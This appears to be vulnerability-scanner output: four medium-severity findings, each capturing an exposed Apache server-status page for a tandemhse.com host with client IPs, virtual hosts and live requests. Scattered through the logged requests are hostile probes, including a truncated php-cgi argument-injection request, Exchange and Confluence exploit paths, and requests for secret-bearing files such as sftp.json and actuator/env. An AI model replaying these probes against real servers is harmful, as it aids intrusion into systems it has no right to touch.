3-3805519470/57/47414_ 3.4000231957630.00.271392.31 64.227.32.66http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.vscode/sftp.json HTTP/1.1 3-3805519470/63/47334_ 3.4000217945750.00.641505.27 64.227.32.66http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /about HTTP/1.1 3-3805519470/59/47825_ 3.3900266026560.00.571565.21 64.227.32.66http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /api/swagger.json HTTP/1.1 3-3805519470/64/47728_ 3.4000343724890.02.501532.26 64.227.32.66http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /debug/default/view?panel=config HTTP/1.1 3-3805519470/61/47068_ 3.200494876298630.00.681464.42 172.71.241.10h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-3805519470/69/48135_ 3.4000363083600.00.841478.91 64.227.32.66http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/_catalog HTTP/1.1 4-3805518060/2/43614_ 0.034970369987850.00.001365.99 172.68.103.89h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-3805518060/4/43675_ 1.436811258531490.00.361424.55 172.68.134.148h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-3805518060/4/43671_ 0.9549720218516770.00.021474.72 162.158.122.98h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-3805518060/1/44059_ 0.804960235152510.00.001330.51 172.69.68.27h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-3805518060/2/43307_ 0.816760245755720.00.001297.87 172.69.9.67h2lcftech.es:443done, streams: 0/1/1/0/0 (open
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb310f155dc80f155dc8ca2d1a6f
Apache Status Apache Server Status for www.adr.tandemhse.com (via 103.23.61.80) Server Version: Apache/2.4.37 (rocky) OpenSSL/1.1.1k Server MPM: event Server Built: Apr 6 2023 16:38:06 Current Time: Thursday, 20-Nov-2025 13:52:23 CET Restart Time: Friday, 12-Sep-2025 13:21:02 CEST Parent Server Config. Generation: 371 Parent Server MPM Generation: 370 Server uptime: 69 days 1 hour 31 minutes 20 seconds Server load: 0.28 0.31 0.24 Total accesses: 2163206 - Total Traffic: 67.5 GB - Total Duration: 1317814340 CPU Usage: u210.6 s228.73 cu11901.8 cs6756.05 - .32% CPU load .363 requests/sec - 11.9 kB/second - 32.7 kB/request - 609.195 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 0339401no1yes19000 1339267no0yes010000 2339266no0yes010000 3339268no2yes010020 4339269no0yes010000 Sum503 149020 ____W_____________________________________________ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-3703394010/584/40966_ 33.7900306908920.017.351540.88 159.65.18.197http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.vscode/sftp.json HTTP/1.1 0-3703394010/577/40313_ 33.7301459100410.031.371323.37 172.71.254.220h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-3703394010/583/40764_ 33.7700174603790.033.251344.96 159.65.18.197http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcPOST /api/gql HTTP/1.1 0-3703394010/547/40542_ 33.780409192058330.011.901361.39 172.71.135.80h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-3703394010/552/41075W 33.7000179972410.015.641387.16 159.65.18.197http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server-status HTTP/1.1 0-3703394010/573/40840_ 33.7910187972550.017.571380.97 159.65.18.197http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /api/swagger.json HTTP/1.1 0-3703394010/555/41041_ 33.7900258184920.014.731283.59 159.65.18.197http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /@vite/env HTTP/1.1 0-3703394010/567/40407_ 33.7900172646980.032.521381.68 159.65.18.197http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /actuator/env HTTP/1.1 0-3703394010/596/40983_ 33.7900184932670.031.631286.69 159.65.18.197http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcPOST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3D0+%ADd+disa 0-3703394010/547/40780_ 33.7900218684340.032.361480.76 159.65.18.197http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 1-3703392670/228/45861_ 17.731820199487450.05.791502.27 104.22.7.151h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-3703392670/229/46453_ 17.7410231130440.04.911505.70 104.22.7.151h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-3703392670/252/46055_ 18.1620244507920.013.431449.81 159.65.18.197http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcPOST /graphql HTTP/1.1 1-3703392670/230/45900_ 17.741110690580560.012.881418.48 212.170.119.244h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-3703392670/245/46666_ 18.090109211235630.07.431493.58 220.81.215.178http/1.1barrerasdecontencion.com:443POST /xmlrpc.php HTTP/1.1 1-3703392670/221/47120_ 17.382125212013750.05.191411.98 2.136.78.3h2relehse.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-3703392670/209/46417_ 17.7320248068600.06.301412.79 172.68.135.145h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-3703392670/218/46830_ 18.1620197132710.05.181416.18 159.65.18.197http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcPOST /api HTTP/1.1 1-3703392670/216/45205_ 18.1700325859140.05.431282.80 159.65.18.197http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /debug/default/view?panel=config HTTP/1.1 1-3703392670/246/46546_ 18.1610451964770.07.711366.52 159.65.18.197http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /swagger.json HTTP/1.1 2-3703392660/62/42407_ 9.7611206707470.02.361303.31 162.158.179.189h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-3703392660/56/41439_ 8.46486340352367170.00.821222.54 188.114.111.19h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-3703392660/56/42081_ 8.503310269516270.013.231335.40 58.51.241.4http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcdone, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-3703392660/51/41362_ 9.82336436200478790.00.591261.04 108.162.227.16h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-3703392660/56/41604_ 9.5220168066130.01.121433.32 172.68.134.208h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-3703392660/65/42024_ 9.513300193537830.01.661238.74 172.68.134.34h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-3703392660/63/41596_ 9.9510185861970.00.911271.14 159.65.18.197http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v3/api-docs HTTP/1.1 2-3703392660/58/41831_ 9.534910195093810.01.771289.97 172.68.135.56h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-3703392660/60/41895_ 9.0448645200594650.00.971455.89 2.136.78.3h2relehse.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-3703392660/52/41965_ 9.9520227398720.01.431336.47 159.65.18.197http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcPOST /graphql/api HTTP/1.1 3-3703392680/383/46692_ 23.62321274062520.011.071495.79 2.136.78.3h2relehse.com:443idle, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 3-3703392680/333/45445_ 23.6200236235510.08.551309.20 159.65.18.197http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server HTTP/1.1 3-3703392680/344/46651_ 23.55361269596820.09.041465.42 220.81.215.178http/1.1barrerasdecontencion.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-3703392680/359/45850_ 23.6300292584810.031.631555.09 159.65.18.197http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /about HTTP/1.1 3-3703392680/329/45736_ 23.62139212998260.010.081363.99 2.136.78.3h2relehse.com:443idle, streams: 0/3/3/0/0 (open/recv/resp/push/rst) 3-3703392680/356/45823_ 23.61015207527510.08.101476.31 162.158.120.157h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-3703392680/344/46300_ 23.6220249616370.09.011512.65 159.65.18.197http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET / HTTP/1.1 3-3703392680/326/46237_ 23.5520325875250.06.511474.83 104.22.7.132h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-3703392680/294/45673_ 23.6300865218420.05.141438.56 159.65.18.197http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/_catalog HTTP/1.1 3-3703392680/342/46635_ 23.623156351263930.08.301446.13 2.136.78.3h2relehse.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-3703392690/29/41268_ 7.968880351099310.01.651323.19 172.68.134.118h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-3703392690/28/41197_ 6.558880221370460.00.381359.60 162.158.134.42h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-3703392690/42/41404_ 7.51105441194146660.01.701407.45 162.158.123.2h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-3703392690/30/41791_ 8.4310215517790.02.091272.92 159.65.18.197http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/api-docs HTTP/1.1 4-3703392690/28/41209_ 8.431339230446940.00.521240.85 172.71.127.41h2tandem
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb310f155dc80f155dc81abf6c4f
Apache Status Apache Server Status for www.adr.tandemhse.com (via 103.23.61.80) Server Version: Apache/2.4.37 (rocky) OpenSSL/1.1.1k Server MPM: event Server Built: Apr 6 2023 16:38:06 Current Time: Sunday, 16-Nov-2025 08:22:52 CET Restart Time: Friday, 12-Sep-2025 13:21:02 CEST Parent Server Config. Generation: 353 Parent Server MPM Generation: 352 Server uptime: 64 days 20 hours 1 minute 50 seconds Server load: 0.04 0.11 0.12 Total accesses: 2033305 - Total Traffic: 63.2 GB - Total Duration: 1230501275 CPU Usage: u158.1 s205.22 cu11176.7 cs6323 - .319% CPU load .363 requests/sec - 11.8 kB/second - 32.6 kB/request - 605.173 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 04075190no0yes010000 14075193no0yes010000 24075191no0yes010000 34075358no1yes010000 44075192no0yes19000 Sum501 149000 _________________________________________W________ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-35240751900/1/37608_ 1.69165123290659940.00.001394.17 172.68.135.66h2tandemsl.com:443done, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 0-35240751900/7/36942_ 5.181656192441823270.00.021232.70 104.23.248.107h2tandemsl.com:443idle, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 0-35240751900/4/37305_ 5.171658419157866590.00.041245.42 104.23.248.107h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-35240751900/3/37342_ 1.6939210176445010.00.011298.11 159.89.12.166http/1.1relehse.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-35240751900/6/37627_ 4.463830163396980.00.031286.68 104.23.211.142h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-35240751900/2/37624_ 4.4439211172210910.00.011270.23 162.158.154.217h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-35240751900/5/37695_ 5.61388435241904130.00.051184.75 172.70.175.107h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-35240751900/3/37233_ 1.243926149156641550.00.011261.32 172.70.80.147h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-35240751900/5/37518_ 1.6916510167585960.00.031193.73 159.89.12.166http/1.1relehse.com:443GET /s/0383e21363e23323e2330313/_/;/META-INF/maven/com.atlassia 0-35240751900/3/37374_ 1.56383206196044350.00.031315.06 172.64.198.26h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-35240751930/1/43567_ 0.2680190159690.00.021394.36 104.23.248.153h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-35240751930/2/44225_ 0.70344218915590.00.011416.56 77.237.245.107http/1.1barrerasdecontencion.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-35240751930/2/43796_ 0.6920495497229991410.00.011377.43 162.158.123.2h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-35240751930/4/43646_ 3.64392911816687676557900.00.001333.48 162.158.123.2http/1.1lcftech.es:443POST /?wordfence_syncAttackData=1763271866.38 HTTP/2.0 1-35240751930/4/44383_ 5.4680184187110.00.021402.23 167.99.182.39http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcPOST /graphql HTTP/1.1 1-35240751930/10/44898_ 4.2439300197576490.00.041330.76 162.158.79.64h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-35240751930/6/44256_ 4.8220541236545670.00.061348.44 104.23.253.85h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-35240751930/3/44663_ 4.0820542188420550.00.001321.36 172.68.23.63h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-35240751930/7/42917_ 5.4640302347810.00.051211.87 167.99.182.39http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v3/api-docs HTTP/1.1 1-35240751930/5/44319_ 4.0820491436562870.00.031296.85 172.68.23.237h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-35240751910/11/41195_ 4.782678358200287080.00.091252.38 172.71.120.128h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-35240751910/7/40255_ 4.032673334346523340.00.011188.45 162.158.41.244h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-35240751910/5/40974_ 2.9233600264454840.00.131279.08 104.23.187.190h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-35240751910/22/40191_ 4.51523358194849430.00.101216.60 172.69.192.163h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-35240751910/16/40507_ 4.365221162876210.00.071405.12 172.70.43.72h2lcftech.es:443done, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 2-35240751910/11/40815_ 4.2133602187675020.00.151202.30 108.162.246.64h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-35240751910/10/40424_ 4.563365517180359170.00.031222.19 172.69.192.164h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-35240751910/9/40651_ 5.41528404189636410.00.071257.02 172.71.22.149h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-35240751910/3/40750_ 0.95354012666195096590.00.031420.07 104.23.190.153h2lcftech.es:443idle, streams: 0/1/0/0/1 (open/recv/resp/push/rst) 2-35240751910/10/40774_ 4.3526730221380490.00.121275.57 172.69.7.248h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-35240753580/112/43923_ 11.3030256003050.03.021385.54 167.99.182.39http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /api-docs/swagger.json HTTP/1.1 3-35240753580/119/42586_ 11.3110208278110.01.541234.60 167.99.182.39http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.vscode/sftp.json HTTP/1.1 3-35240753580/115/43658_ 11.2940226464320.01.861372.47 167.99.182.39http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/api-docs HTTP/1.1 3-35240753580/111/43005_ 11.132964267819470.01.311440.89 162.158.217.41h2lcftech.es:443done, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 3-35240753580/115/42921_ 11.284397196613420.02.091287.38 172.71.232.30h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-35240753580/107/42965_ 11.243328194533910.012.171354.00 104.23.203.145h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-35240753580/109/43379_ 11.3020230529690.01.421428.55 167.99.182.39http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcPOST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3D0+%ADd+disa 3-35240753580/93/43407_ 11.2900307209040.01.131365.59 167.99.182.39http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /swagger/v1/swagger.json HTTP/1.1 3-35240753580/105/42625_ 11.3110845242260.01.591339.18 167.99.182.39http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /debug/default/view?panel=config HTTP/1.1 3-35240753580/109/43856_ 11.034562335520730.01.451370.92 104.23.211.83h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-35240751920/126/37864_ 11.7930331511710.03.171215.00 167.99.182.39http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /@vite/env HTTP/1.1 4-35240751920/120/37960W 11.7900199991210.01.341268.49 167.99.182.39http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server-status HTTP/1.1 4-35240751920/99/38096_ 11.8000173536720.02.231293.13 167.99.182.39http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 4-35240751920/101/38417_ 11.562474178210990.01.531160.44 20.172.67.176http/1.1 4-35240751920/118/37862_ 11.800018439
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb310f155dc80f155dc809cccca4
Apache Status Apache Server Status for www.adr.tandemhse.com (via 103.23.61.80) Server Version: Apache/2.4.37 (rocky) OpenSSL/1.1.1k Server MPM: event Server Built: Apr 6 2023 16:38:06 Current Time: Friday, 14-Nov-2025 09:08:07 CET Restart Time: Friday, 12-Sep-2025 13:21:02 CEST Parent Server Config. Generation: 340 Parent Server MPM Generation: 339 Server uptime: 62 days 20 hours 47 minutes 5 seconds Server load: 0.20 0.17 0.21 Total accesses: 1986479 - Total Traffic: 61.9 GB - Total Duration: 1140879386 CPU Usage: u246.35 s251.01 cu10779.4 cs6087.54 - .32% CPU load .366 requests/sec - 11.9 kB/second - 32.7 kB/request - 574.322 ms/request 2 requests currently being processed, 48 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 03804714no0yes28000 13804715no0yes010000 23804891no2yes010000 33804862no0yes010000 43804831no0yes010000 Sum502 248000 ____W____R________________________________________ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-33938047140/737/37187_ 53.1100289230280.013.481385.23 138.197.191.87http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /actuator/env HTTP/1.1 0-33938047140/694/36559_ 53.1100440499590.011.141225.97 138.197.191.87http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.vscode/sftp.json HTTP/1.1 0-33938047140/694/36903_ 53.10020156494150.011.241234.24 212.170.119.244h2relehse.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-33938047140/762/36955_ 53.1100175071010.013.981274.99 138.197.191.87http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 0-33938047140/724/37151W 53.0800162032290.08.611257.97 138.197.191.87http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server-status HTTP/1.1 0-33938047140/720/37236_ 53.0900170787020.011.441261.02 138.197.191.87http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /webjars/swagger-ui/index.html HTTP/1.1 0-33938047140/664/37302_ 53.1010240302300.09.191179.19 138.197.191.87http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /@vite/env HTTP/1.1 0-33938047140/788/36848_ 53.05118155109750.021.711251.49 213.0.55.154h2cinre-backend.tandemhse.com:443done, streams: 0/24/24/0/0 (open/recv/resp/push/rst) 0-33938047140/684/37154_ 53.1010165916240.08.471187.38 138.197.191.87http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v3/api-docs HTTP/1.1 0-33938047140/756/36965R 53.0300194286260.014.401306.73 162.158.120.157h2tandemsl.com:443GET /seguridad-de-producto-blog/etiquetar-productos-quimicos/ H 1-33938047150/42/42534_ 20.47104374180132220.01.271375.11 213.0.55.154h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-33938047150/53/43262_ 19.982750213415090.07.461375.58 172.71.15.66h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-33938047150/44/42809_ 19.975092207910750.00.931334.54 172.68.213.219h2tandemsl.com:443done, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 1-33938047150/43/42664_ 20.05343332199934290.00.991313.85 195.76.169.226http/1.1 1-33938047150/39/43368_ 20.274620179554610.01.141384.56 162.158.122.120h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-33938047150/35/43906_ 20.57280380188552920.01.381302.05 104.23.175.17h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-33938047150/40/43185_ 19.984620227925760.00.741323.51 172.71.15.156h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-33938047150/43/43644_ 20.47274351181270280.00.551288.09 188.114.111.18h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-33938047150/52/41921_ 20.49467267290206130.01.461193.62 108.162.241.225h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-33938047150/40/43296_ 19.955090417725720.00.981263.16 162.158.190.29h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-33938048910/440/40446_ 39.8710197193680.021.751214.35 212.170.119.244h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 2-33938048910/450/39425_ 39.9700239992860.022.091164.33 138.197.191.87http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcPOST /graphql/api HTTP/1.1 2-33938048910/457/40159_ 39.9800262151150.012.591243.63 138.197.191.87http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcPOST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3D0+%ADd+disa 2-33938048910/448/39394_ 39.9900190503860.014.761199.98 138.197.191.87http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /debug/default/view?panel=config HTTP/1.1 2-33938048910/478/39668_ 39.9701160237850.014.251371.40 138.197.191.87http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET / HTTP/1.1 2-33938048910/435/39947_ 39.9900184472730.013.641184.03 138.197.191.87http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server HTTP/1.1 2-33938048910/421/39705_ 39.940933177294730.013.951195.15 172.70.34.150h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-33938048910/463/39851_ 39.9900186272440.038.961224.94 138.197.191.87http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /about HTTP/1.1 2-33938048910/429/40007_ 39.9800191807580.020.031361.40 138.197.191.87http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /swagger.json HTTP/1.1 2-33938048910/470/39946_ 40.0000218398030.032.741248.56 138.197.191.87http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/_catalog HTTP/1.1 3-33938048620/669/42296_ 48.8621514245270650.029.471352.15 195.76.169.226h2relehse.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-33938048620/666/40918_ 48.422150197398920.017.401197.02 172.71.15.82h2tandemsl.com:443done, streams: 0/7/7/0/0 (open/recv/resp/push/rst) 3-33938048620/660/41989_ 48.7622515215119810.020.731342.06 212.170.119.244h2relehse.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-33938048620/696/41350_ 48.27697408258278520.014.611374.74 2.136.78.3h2done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-33938048620/649/41301_ 49.0523010182341220.018.541257.16 2.136.78.3h2relehse.com:443idle, streams: 0/5/5/0/0 (open/recv/resp/push/rst) 3-33938048620/643/41367_ 49.0522057185021310.017.581287.49 2.136.78.3h2relehse.com:443idle, streams: 0/7/7/0/0 (open/recv/resp/push/rst) 3-33938048620/646/41724_ 49.0522546209558720.019.951395.61 2.136.78.3h2relehse.com:443idle, streams: 0/6/6/0/0 (open/recv/resp/push/rst) 3-33938048620/651/41790_ 48.146971287416540.011.831331.80 2.136.78.3h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 3-33938048620/689/41030_ 49.04233117833911270.018.471302.60 2.136.78.3h2relehse.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-33938048620/666/42259_ 49.0423054327255570.019.341338.85 2.136.78.3h2relehse.com:443idle, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 4-33938048310/53/37058_ 20.837423326971890.00.901193.20 213.0.55.154h2cinre-backend.tandemhse.com:443idle, streams: 0/36/36/0/0 (open/recv/resp/push/rst) 4-33938048310/50/37116_ 20.83744195567990.00.391243.28 213.0.55.154h2cinre-backend.tandemhse.com:443idle, streams: 0/25/25/0/0 (open/recv/resp/push/rst) 4-33938048310/66/37319_ 20.84738169101970.01.541275.62 213.0.55.154h2cinre-backend.tandemhse.com:443idle, streams: 0/41/41/0/0 (open/recv/resp/push/rst) 4-33938048310/58/37614_ 20.82740172783400.01.391139.34 213.0.55.154h2cinre-backend.tandemhse.com:443idle, streams: 0/22/22/0/0 (open/recv/resp/push/rst) 4-33938048310/41/37011_ 20.82680<
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb310f155dc80f155dc8d9391b67
Apache Status Apache Server Status for www.adr.tandemhse.com (via 103.23.61.80) Server Version: Apache/2.4.37 (rocky) OpenSSL/1.1.1k Server MPM: event Server Built: Apr 6 2023 16:38:06 Current Time: Wednesday, 12-Nov-2025 07:25:27 CET Restart Time: Friday, 12-Sep-2025 13:21:02 CEST Parent Server Config. Generation: 334 Parent Server MPM Generation: 333 Server uptime: 60 days 19 hours 4 minutes 24 seconds Server load: 0.10 0.16 0.15 Total accesses: 1905222 - Total Traffic: 59.1 GB - Total Duration: 1093806153 CPU Usage: u139.02 s184.18 cu10482.1 cs5916.06 - .318% CPU load .363 requests/sec - 11.8 kB/second - 32.5 kB/request - 574.11 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 03628750no0yes010000 13628751no0yes010000 23628755no0yes010000 33628857no0yes010000 43628886no1yes19000 Sum501 149000 _______________________________________________W__ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-33336287500/13/35636_ 1.115154341281846520.00.041321.24 123.160.223.78http/1.1 0-33336287500/13/35030_ 2.8630433946280.00.061182.60 167.99.181.249http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /api-docs/swagger.json HTTP/1.1 0-33336287500/7/35361_ 1.182600417149743450.00.031207.05 172.71.190.39h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-33336287500/20/35340_ 0.993338167054010.00.061239.65 172.68.15.231h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-33336287500/10/35631_ 1.92302024155868800.00.031215.47 162.158.122.71h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-33336287500/12/35727_ 1.2551550164197740.00.011212.81 123.160.223.78http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /favicon.ico HTTP/1.1 0-33336287500/10/35804_ 0.9826000232783420.00.011134.28 93.174.93.12http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcdone, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-33336287500/8/35244_ 